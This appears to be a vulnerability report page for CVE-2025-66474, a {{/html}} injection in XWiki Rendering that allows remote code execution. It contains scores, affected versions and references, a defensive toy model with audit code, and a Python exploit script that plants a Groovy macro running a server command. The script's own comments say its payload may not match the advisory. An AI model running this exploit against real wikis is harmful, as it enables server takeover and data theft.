Security Vulnerability Report
CVE-2025-66474 CVSS 8.8 HIGH


Published: 2025-12-10 22:16:28
Last Modified: 2025-12-19 17:13:41

Description

XWiki Rendering is a generic rendering system that converts textual input in a given syntax (wiki syntax, HTML, etc.) into another syntax (XHTML, etc.). Versions 16.10.9 and below, 17.0.0-rc-1 through 17.4.2 and 17.5.0-rc-1 through 17.5.0 have insufficient protection against {{/html}} injection, which an attacker can exploit to achieve remote code execution. Any user who can edit their own profile or any other document can execute arbitrary script macros, including Groovy and Python macros, which give remote code execution as well as unrestricted read and write access to all wiki contents. This issue is fixed in versions 16.10.10, 17.4.3 and 17.6.0-rc-1. The listed patches touch both xwiki-rendering and xwiki-platform, so check the installed platform version as well as the bundled rendering library when assessing exposure.
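The mechanism behind the description, as an added example that is not code from xwiki-rendering, xwiki-platform or this page's PoC: a small model of macro syntax in which everything up to the first unescaped {{/html}} is emitted as raw HTML and everything after it is parsed as wiki syntax again, so an injected close marker followed by a script macro gets the macro executed. The model's rules (macro names matched case-insensitively with optional whitespace before "}}", "~" as the escape character inside macro bodies, and the set of script macro names) are assumptions of this example, not a description of the real parser; the advisory on this page gives no such detail. The block contrasts a weak wrapper that neutralises only one literal spelling of the marker with one that escapes the syntax itself, and includes an audit function a defender can run over stored user-controlled field values.

```python
"""Toy model of {{/html}} injection in XWiki-style macro syntax.

Added example, not code from xwiki-rendering. Model ASSUMPTIONS (the advisory
does not describe the real parser): '{{name}}' opens a macro, '{{/name}}' closes
it, the name is matched case-insensitively with optional whitespace before '}}',
and '~' escapes the character that follows it.
"""
import re

OPEN_HTML = "{{html}}"
CLOSE_HTML = re.compile(r"\{\{/html\s*\}\}", re.IGNORECASE)
# Macro names assumed here: XWiki's standard script macros.
SCRIPT_MACRO = re.compile(r"\{\{(groovy|python|velocity|script)\b", re.IGNORECASE)


def _is_escaped(text, i):
    """True if text[i] is escaped, i.e. preceded by an odd-length run of '~'."""
    n = 0
    while i - n - 1 >= 0 and text[i - n - 1] == "~":
        n += 1
    return n % 2 == 1


def split_html_macro(wrapped):
    """Model of the rendering step: the body runs up to the first unescaped
    {{/html}} and is emitted as raw HTML (macros inside it do not run); whatever
    follows is parsed as wiki syntax again, where script macros DO run.
    Returns (body, trailing_wiki_text)."""
    if not wrapped.startswith(OPEN_HTML):
        raise ValueError("expected content wrapped in {{html}}")
    inner = wrapped[len(OPEN_HTML):]
    for m in CLOSE_HTML.finditer(inner):
        if not _is_escaped(inner, m.start()):
            return inner[:m.start()], inner[m.end():]
    return inner, ""


def escapes_to_script_macro(wrapped):
    """True if user content broke out of the {{html}} body and a script macro
    would be parsed (and executed) after it."""
    _, trailing = split_html_macro(wrapped)
    return SCRIPT_MACRO.search(trailing) is not None


def wrap_html_naive(user_input):
    """Weak neutralisation: escapes only the exact literal '{{/html}}'.
    Illustrative weak pattern for this example; not the code XWiki shipped."""
    return OPEN_HTML + user_input.replace("{{/html}}", "~{{/html}}") + "{{/html}}"


def wrap_html_robust(user_input):
    """Robust neutralisation: escape the escape character and every '{', so no
    spelling of any close marker (case, whitespace, nesting) can form."""
    escaped = user_input.replace("~", "~~").replace("{", "~{")
    return OPEN_HTML + escaped + "{{/html}}"


def audit_field_value(value):
    """Defender-side check for a stored user-controlled field (e.g. a profile
    property) that the application wraps in {{html}}: report every unescaped
    close-marker variant and every script macro, as (kind, offset) pairs."""
    findings = []
    for m in CLOSE_HTML.finditer(value):
        if not _is_escaped(value, m.start()):
            findings.append(("html-close-marker", m.start()))
    for m in SCRIPT_MACRO.finditer(value):
        findings.append(("script-macro:" + m.group(1).lower(), m.start()))
    return sorted(findings, key=lambda f: f[1])


if __name__ == "__main__":
    # Constructed sample: a profile "bio" with an upper-case close marker.
    payload = "<b>bio</b>{{/HTML}}{{groovy}}println 'x'{{/groovy}}"
    print("naive wrapper escapes:", escapes_to_script_macro(wrap_html_naive(payload)))
    print("robust wrapper escapes:", escapes_to_script_macro(wrap_html_robust(payload)))
    print("audit findings:", audit_field_value(payload))
```

The point of the two wrappers is the design choice, not the regex: neutralising the one payload you know about ("{{/html}}") leaves every other spelling the parser accepts, while escaping the syntax characters themselves closes the whole class. The audit function is the check to run over exported user objects and document content after patching, since a payload saved before the upgrade is still stored.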

CVSS Details

CVSS Score (NVD, CVSS 3.1, primary)
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0 Score (GitHub, secondary)
8.7 HIGH
CVSS 4.0 Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Weakness
CWE-94 (NVD, primary); CWE-95 (GitHub, secondary)

Configurations (Affected Products)

cpe:2.3:a:xwiki:xwiki-rendering:*:*:*:*:*:*:*:* (versions before 16.10.10) - VULNERABLE
cpe:2.3:a:xwiki:xwiki-rendering:*:*:*:*:*:*:*:* (versions from 17.0.0 before 17.4.3) - VULNERABLE
cpe:2.3:a:xwiki:xwiki-rendering:17.5.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:xwiki:xwiki-rendering:17.5.0:rc1:*:*:*:*:*:* - VULNERABLE
XWiki Rendering <= 16.10.9
XWiki Rendering 17.0.0-rc-1 through 17.4.2
XWiki Rendering 17.5.0-rc-1 through 17.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
'''CVE-2025-66474 XWiki RCE PoC
Vulnerable versions: XWiki Rendering <= 16.10.9, 17.0.0-rc-1 to 17.4.2, 17.5.0-rc-1 to 17.5.0
Reference: https://github.com/xwiki/xwiki-rendering/security/advisories/GHSA-9xc6-c2rm-f27p
'''
import sys

import requests

TARGET_URL = "http://target-xwiki-instance.com"
USERNAME = "attacker"
PASSWORD = "attacker_password"


def exploit_cve_2025_66474(target=TARGET_URL, username=USERNAME, password=PASSWORD):
    """Exploit for XWiki Rendering {{/html}} injection leading to RCE.
    The attacker injects a Groovy script macro through HTML injection.

    The endpoints, form fields and profile document path below are the original
    PoC's assumptions about the XWiki HTTP interface; verify them against the
    target (e.g. save a harmless page through the UI and capture the request)
    before relying on the result.
    """
    session = requests.Session()

    # Step 1: Login to XWiki with a low-privilege account (PR:L in the CVSS vector)
    login_url = f"{target}/bin/login/XWiki/XWikiLogin"
    login_data = {"j_username": username, "j_password": password, "xredirect": "/"}
    resp = session.post(login_url, data=login_data)
    print(f"[*] Login POST returned HTTP {resp.status_code}")

    # Step 2: Build the payload. The Groovy macro runs `whoami` on the server
    # and prints the first line of its output into the rendered page.
    groovy_payload = '''{{groovy}}
import java.io.*
def cmd = "whoami"
def p = Runtime.getRuntime().exec(cmd)
p.waitFor()
println new BufferedReader(new InputStreamReader(p.getInputStream())).readLine()
{{/groovy}}'''

    # HTML injection payload, built by plain concatenation: inside an f-string
    # '{{html}}' would become '{html}', since '{{' is an escaped brace there.
    # Note: as in the original PoC, this places the Groovy macro inside an
    # {{html}} macro. The advisory describes an early {{/html}} marker inside
    # content that the application itself wraps in {{html}}; this page gives no
    # detail of that field, so the payload is kept as written.
    exploit_content = "{{html}}\n" + groovy_payload + "\n{{/html}}"

    # Step 3: Create or edit a document with the malicious content
    doc_url = f"{target}/bin/edit/XWiki/UserProfile/{username}"
    doc_data = {"content": exploit_content, "action": "save"}
    resp = session.post(doc_url, data=doc_data)
    print(f"[*] Save POST returned HTTP {resp.status_code}")

    # Step 4: Trigger the vulnerability by viewing (i.e. rendering) the document
    view_url = f"{target}/bin/view/XWiki/UserProfile/{username}"
    resp = session.get(view_url)
    print(f"[*] View GET returned HTTP {resp.status_code}")
    print("[+] Exploit sent. Check the rendered page / server for command execution.")
    return resp.status_code == 200


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else TARGET_URL
    exploit_cve_2025_66474(target)

References

https://github.com/xwiki/xwiki-rendering/security/advisories/GHSA-9xc6-c2rm-f27p (Patch, Vendor Advisory)
https://github.com/xwiki/xwiki-rendering/commit/9b71a2ee035815cfc29cebbfe81dbdd98f941d49 (Patch)
https://github.com/xwiki/xwiki-platform/commit/12b780ccd5bca5fc8f74f46648d7e02fa04fbc11 (Patch)
https://jira.xwiki.org/browse/XRENDERING-693 (Exploit, Patch, Vendor Advisory)
https://jira.xwiki.org/browse/XRENDERING-792 (Exploit, Patch, Vendor Advisory)
https://jira.xwiki.org/browse/XRENDERING-793 (Exploit, Patch, Vendor Advisory)
https://jira.xwiki.org/browse/XWIKI-23378
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66474", "sourceIdentifier": "[email protected]", "published": "2025-12-10T22:16:28.003", "lastModified": "2025-12-19T17:13:41.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "XWiki Rendering is a generic rendering system that converts textual input in a given syntax (wiki syntax, HTML, etc) into another syntax (XHTML, etc). Versions 16.10.9 and below, 17.0.0-rc-1 through 17.4.2 and 17.5.0-rc-1 through 17.5.0 have insufficient protection against {{/html}} injection, which attackers can exploit through RCE. Any user who can edit their own profile or any other document can execute arbitrary script macros, including Groovy and Python macros, which enable remote code execution as well as unrestricted read and write access to all wiki contents. This issue is fixed in versions 16.10.10, 17.4.3 and 17.6.0-rc-1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": 
"NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-95"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xwiki:xwiki-rendering:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.10.10", "matchCriteriaId": "72CCDDF1-82EF-43BB-8A50-AB4FEBF86DB2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:xwiki:xwiki-rendering:*:*:*:*:*:*:*:*", "versionStartIncluding": "17.0.0", "versionEndExcluding": "17.4.3", "matchCriteriaId": "BAFE697A-6548-4734-9BB9-1F9D5B39B6F6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:xwiki:xwiki-rendering:17.5.0:-:*:*:*:*:*:*", "matchCriteriaId": "C6245F8B-C8B0-4818-A7BA-E2FA27E08C20"}, {"vulnerable": true, "criteria": "cpe:2.3:a:xwiki:xwiki-rendering:17.5.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "6A81FD5E-9EDD-4A70-A3CF-81E0FADCD720"}]}]}], "references": [{"url": 
"https://github.com/xwiki/xwiki-platform/commit/12b780ccd5bca5fc8f74f46648d7e02fa04fbc11", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/xwiki/xwiki-rendering/commit/9b71a2ee035815cfc29cebbfe81dbdd98f941d49", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/xwiki/xwiki-rendering/security/advisories/GHSA-9xc6-c2rm-f27p", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://jira.xwiki.org/browse/XRENDERING-693", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}, {"url": "https://jira.xwiki.org/browse/XRENDERING-792", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}, {"url": "https://jira.xwiki.org/browse/XRENDERING-793", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}, {"url": "https://jira.xwiki.org/browse/XWIKI-23378", "source": "security-advisories@git ... (truncated)